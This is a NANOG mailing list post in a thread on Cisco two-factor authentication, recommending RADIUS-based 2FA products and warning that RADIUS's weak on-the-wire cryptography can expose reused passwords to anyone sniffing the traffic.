nanog mailing list archives
Re: Cisco 2 factor authentication
From: Jimmy Hess <mysidia () gmail com>
Date: Sat, 25 Jun 2016 21:46:22 -0500
On Wed, Jun 22, 2016 at 9:38 PM, Chris Lawrence <clawrence () dovefire co uk> wrote:
Any radius based auth works well I've used a solution by secure envoy I the past which seems to work well they also have soft token apps, hard tokens plus SMS based.
However, a cautionary note there is that RADIUS protocol itself uses only weak cryptography and is not secure on the wire. That is, in the absence of AES Keywrap proprietary extension Or when the method of credential used is not authentication using a Client-side Certificate (PKI) as in *EAP. Specifically: if RADIUS is used for the Authentication stage of AAA with a code sent by SMS or OATH token [User types Normal password + One Time Password], then when traffic between RADIUS server and VPN device is captured: The user credentials may be exposed with the extremely weak crypto protection RADIUS or NTLM provides for the user password. If a user re-uses their same password somewhere else on a device not requiring 2FA, then capturing RADIUS traffic could be an effective privilege escalation By copying victim's password from a sniffed RADIUS exchange. -- -JH
Current thread:
- Cisco 2 factor authentication Ray Ludendorff (Jun 22)
- Re: Cisco 2 factor authentication Chris Lawrence (Jun 23)
- Re: Cisco 2 factor authentication Jimmy Hess (Jun 25)
- Re: Cisco 2 factor authentication Alan Buxey (Jun 26)
- Re: Cisco 2 factor authentication Tom Smyth (Jun 26)
- Re: Cisco 2 factor authentication Jimmy Hess (Jun 25)
- Re: Cisco 2 factor authentication Ryan Gelobter (Jun 27)
- <Possible follow-ups>
- Re: Cisco 2 factor authentication Peter Loron (Jun 23)
- Re: Cisco 2 factor authentication Chris Lawrence (Jun 23)